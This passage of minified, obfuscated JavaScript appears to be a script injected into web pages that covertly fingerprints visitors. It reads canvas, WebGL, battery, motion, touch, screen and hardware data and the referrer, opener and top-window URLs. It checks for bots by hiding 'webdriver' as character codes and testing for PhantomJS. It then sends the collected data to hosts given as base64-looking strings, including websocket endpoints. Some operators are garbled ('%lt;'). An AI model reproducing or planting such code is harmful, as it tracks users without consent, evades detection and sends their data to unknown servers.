handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};